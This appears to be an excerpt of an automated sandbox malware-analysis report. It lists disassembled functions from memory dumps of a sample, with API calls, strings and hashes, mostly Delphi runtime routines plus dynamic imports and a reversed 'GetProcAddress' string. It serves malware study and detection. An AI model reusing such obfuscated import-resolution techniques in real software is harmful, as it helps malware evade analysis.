                                                                        • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                        • Instruction Fuzzy Hash: 66A0124040483081854033180C0253430845810A20FD48740ACF8402D0ED2D41609097
                                                                        Function 02C520C4 Relevance: .1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                        Function 02C5D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02C5D29D
                                                                          • Part of subcall function 02C5D268: GetProcAddress.KERNEL32(00000000), ref: 02C5D281
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                        • API String ID: 1646373207-1918263038
                                                                        • Opcode ID: 3058371ee57deff33f0d94b10854a17ed41211ae19cfd605f2fc679733851262
                                                                        • Instruction ID: f09d7f12471ce5ae38aa84f93e2ad056754371833503fccbbc675e574aea6743
                                                                        • Opcode Fuzzy Hash: 3058371ee57deff33f0d94b10854a17ed41211ae19cfd605f2fc679733851262
                                                                        • Instruction Fuzzy Hash: 4541A9E1A893B89A52046B6D7800627B7DED644B143E0461BFC06CBB85DE30FDD5DA2E
                                                                        Function 02C66ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02C66EDE
                                                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02C66EEF
                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02C66EFF
                                                                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02C66F0F
                                                                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02C66F1F
                                                                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02C66F2F
                                                                        • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02C66F3F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                        • API String ID: 667068680-2233174745
                                                                        • Opcode ID: fb7f1c393162f5f29696cf19941adf459450c40c7e6849b77adf9a19cc713e53
                                                                        • Instruction ID: 55614569a86ecc2f64508c0729a318d68cfaf1e5c86db557b25420402588ae74
                                                                        • Opcode Fuzzy Hash: fb7f1c393162f5f29696cf19941adf459450c40c7e6849b77adf9a19cc713e53
                                                                        • Instruction Fuzzy Hash: 7CF04CE1AC83607DBB00BB745CC9A362F9DB9206143701E75ED0359542EE7AD4589F1A
                                                                        Function 02C52530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02C528CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Message
                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                        • API String ID: 2030045667-32948583
                                                                        • Opcode ID: c3a191fc67c52b72492aa17d1bdb118a70ba76b620af1124a7f4c5e37b23ab6c
                                                                        • Instruction ID: c77f7d508f3d3d4ae2a18e05559799ef109aab43e27fc139491982ed028eae63
                                                                        • Opcode Fuzzy Hash: c3a191fc67c52b72492aa17d1bdb118a70ba76b620af1124a7f4c5e37b23ab6c
                                                                        • Instruction Fuzzy Hash: 39A1E671A042748BDB219A2CCC80B99BBE5EF49350F1440E5ED49AB385CF75CAC5CF9A
                                                                        Function 02C5252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Unexpected Memory Leak, xrefs: 02C528C0
                                                                        • , xrefs: 02C52814
                                                                        • An unexpected memory leak has occurred. , xrefs: 02C52690
                                                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02C52849
                                                                        • 7, xrefs: 02C526A1
                                                                        • The unexpected small block leaks are:, xrefs: 02C52707
                                                                        • bytes: , xrefs: 02C5275D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                        • API String ID: 0-2723507874
                                                                        • Opcode ID: b1af171c0d0f6138b23f59a44b6e56e0648df4b6adeb92e4995590907e8117c4
                                                                        • Instruction ID: 10ff52a115c93d03320a73c1fce5e9fa60d2219f62459f8b856f2c5c2f62dd9c
                                                                        • Opcode Fuzzy Hash: b1af171c0d0f6138b23f59a44b6e56e0648df4b6adeb92e4995590907e8117c4
                                                                        • Instruction Fuzzy Hash: 8871C070A042B88FDB219A2CCC84BD9BAE5EF49350F1400E5DD49EB281DB75CAC5CF5A
                                                                        Function 02C6AFE0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C6B000
                                                                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02C6B017
                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 02C6B02F
                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C6B0AB
                                                                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 02C6B0B7
                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 02C6B0CB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Read$HandleLibraryLoadModule
                                                                        • String ID: KernelBase$LoadLibraryExA
                                                                        • API String ID: 2872661360-113032527
                                                                        • Opcode ID: b0f44c30a2d11a7281cfc9c1cc310af526b5d7a50f7973fff0692b534b9cb8d3
                                                                        • Instruction ID: 9944e6dbac7c55c9a5837b9626bcb4dc151057dac0bb5994417f01a66a69cb17
                                                                        • Opcode Fuzzy Hash: b0f44c30a2d11a7281cfc9c1cc310af526b5d7a50f7973fff0692b534b9cb8d3
                                                                        • Instruction Fuzzy Hash: A83162B1640305BBEB20DB69CCC9F797BA8AF45358F004611FA24EB281D730EE44DBA4
                                                                        Function 02C5BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(00000000,02C5C08B,?,?,00000000,00000000), ref: 02C5BDF6
                                                                          • Part of subcall function 02C5A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C5A7E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                        • API String ID: 4232894706-2493093252
                                                                        • Opcode ID: e206e0464e130c82baceb652173ce3303461065fbd87d7edfa336a852b973ad6
                                                                        • Instruction ID: d4a61fe2935ac165859df39723c318119b488e9f272147f54bd8ac632a50f3d1
                                                                        • Opcode Fuzzy Hash: e206e0464e130c82baceb652173ce3303461065fbd87d7edfa336a852b973ad6
                                                                        • Instruction Fuzzy Hash: E1618074B002689BDB04EBA5DC5079F77BBDF88300F608536E9019B245CA39DAC5EF98
                                                                        Function 02C5435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C54423,?,?,02CD67C8,?,?,02C7E7A8,02C565B1,02C7D30D), ref: 02C54395
                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C54423,?,?,02CD67C8,?,?,02C7E7A8,02C565B1,02C7D30D), ref: 02C5439B
                                                                        • GetStdHandle.KERNEL32(000000F5,02C543E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C54423,?,?,02CD67C8), ref: 02C543B0
                                                                        • WriteFile.KERNEL32(00000000,000000F5,02C543E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C54423,?,?), ref: 02C543B6
                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02C543D4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FileHandleWrite$Message
                                                                        • String ID: Error$Runtime error at 00000000
                                                                        • API String ID: 1570097196-2970929446
                                                                        • Opcode ID: fe534387ff2c445dc99ee431bf0d0be30d8e1ee79fcaf995d2c9062445798bb4
                                                                        • Instruction ID: 1b5de26b4be699cc66f3aebc0275c74cc57647454482d9618f97e74cda42b1f2
                                                                        • Opcode Fuzzy Hash: fe534387ff2c445dc99ee431bf0d0be30d8e1ee79fcaf995d2c9062445798bb4
                                                                        • Instruction Fuzzy Hash: CBF02462AC532074F738A6B06C4AF5B235C4784F21F140B99FB28940D087F4C0C4AB2E
                                                                        Function 02C5AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C5AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C5AD59
                                                                          • Part of subcall function 02C5AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C5AD7D
                                                                          • Part of subcall function 02C5AD3C: GetModuleFileNameA.KERNEL32(02C50000,?,00000105), ref: 02C5AD98
                                                                          • Part of subcall function 02C5AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C5AE2E
                                                                        • CharToOemA.USER32(?,?), ref: 02C5AEFB
                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02C5AF18
                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C5AF1E
                                                                        • GetStdHandle.KERNEL32(000000F4,02C5AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C5AF33
                                                                        • WriteFile.KERNEL32(00000000,000000F4,02C5AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C5AF39
                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02C5AF5B
                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02C5AF71
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                        • String ID:
                                                                        • API String ID: 185507032-0
                                                                        • Opcode ID: 9fc261b614f99c840fc90390796158cedfe9c845ee1ca82c02a8f9a233f23df6
                                                                        • Instruction ID: cf2e54f58f4e7cb22e01afdde01f22d151593c40d75a339539db8bf115a163be
                                                                        • Opcode Fuzzy Hash: 9fc261b614f99c840fc90390796158cedfe9c845ee1ca82c02a8f9a233f23df6
                                                                        • Instruction Fuzzy Hash: 95115AB2548225BED300FBA4CC81F8B77EDAB44740F904B25BB45D70E0DA75E9849F6A
                                                                        Function 02C5E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C5E625
                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C5E641
                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02C5E67A
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C5E6F7
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02C5E710
                                                                        • VariantCopy.OLEAUT32(?,00000000), ref: 02C5E745
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                        • String ID:
                                                                        • API String ID: 351091851-0
                                                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                        • Instruction ID: 1fe0c14c8596b52f3e0e6cd2209017a24743efcca0b76fcebbacc949190ad00f
                                                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                        • Instruction Fuzzy Hash: 4051D47590162D9BCB22DF58C880BDAB3BDAF48340F4041D5EA09A7211DA30EFC59FA9
                                                                        Function 02C53598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C535BA
                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02C53609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C535ED
                                                                        • RegCloseKey.ADVAPI32(?,02C53610,00000000,?,00000004,00000000,02C53609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C53603
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                        • API String ID: 3677997916-4173385793
                                                                        • Opcode ID: bc155ee099528877abadf58ce691348e7ab12f67d584844ce0c5524f109172d8
                                                                        • Instruction ID: 0e01d2909c12cd01785a90b2561628a1e4c6ac3f4b6b0b05ab4a9a621476ce2c
                                                                        • Opcode Fuzzy Hash: bc155ee099528877abadf58ce691348e7ab12f67d584844ce0c5524f109172d8
                                                                        • Instruction Fuzzy Hash: E601B575940368BAEB11DB908D42BB977ECE708B00F1045A5BE04D7680E6B4E650DA5D
                                                                        Function 02C68274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                        • GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: Kernel32$sserddAcorPteG
                                                                        • API String ID: 667068680-1372893251
                                                                        • Opcode ID: 577061d5fb280453b01deaf45149bceac13a9b0379a52f07daa94dc449a032fd
                                                                        • Instruction ID: 58f868e94b92be5028de16dde345f2964c296c0a428f2fb071f2b0a6b905169e
                                                                        • Opcode Fuzzy Hash: 577061d5fb280453b01deaf45149bceac13a9b0379a52f07daa94dc449a032fd
                                                                        • Instruction Fuzzy Hash: F0016274640314AFEB14EFA4DC95F6EB7EEEB48B10F914970BC04D7600DA70E994DA28
                                                                        Function 02C5AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(?,00000000,02C5AAE7,?,?,00000000), ref: 02C5AA68
                                                                          • Part of subcall function 02C5A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C5A7E2
                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02C5AAE7,?,?,00000000), ref: 02C5AA98
                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02C5AAA3
                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02C5AAE7,?,?,00000000), ref: 02C5AAC1
                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02C5AACC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                        • String ID:
                                                                        • API String ID: 4102113445-0
                                                                        • Opcode ID: 5f3180ea9252f84f48b58a15795cc6cf7bdf90266b8361a65552ed79675a7a45
                                                                        • Instruction ID: d5b7ec571cd73aa18d91fdb183f6c41bbda49c14fdeceedfc2e115a333652c77
                                                                        • Opcode Fuzzy Hash: 5f3180ea9252f84f48b58a15795cc6cf7bdf90266b8361a65552ed79675a7a45
                                                                        • Instruction Fuzzy Hash: BC01F7B42802747FF611AA65CD21B5A77DDDB85720FA10270FD00A66C0DA75DEC09A6C
                                                                        Function 02C5AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(?,00000000,02C5ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02C5AB2F
                                                                          • Part of subcall function 02C5A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C5A7E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
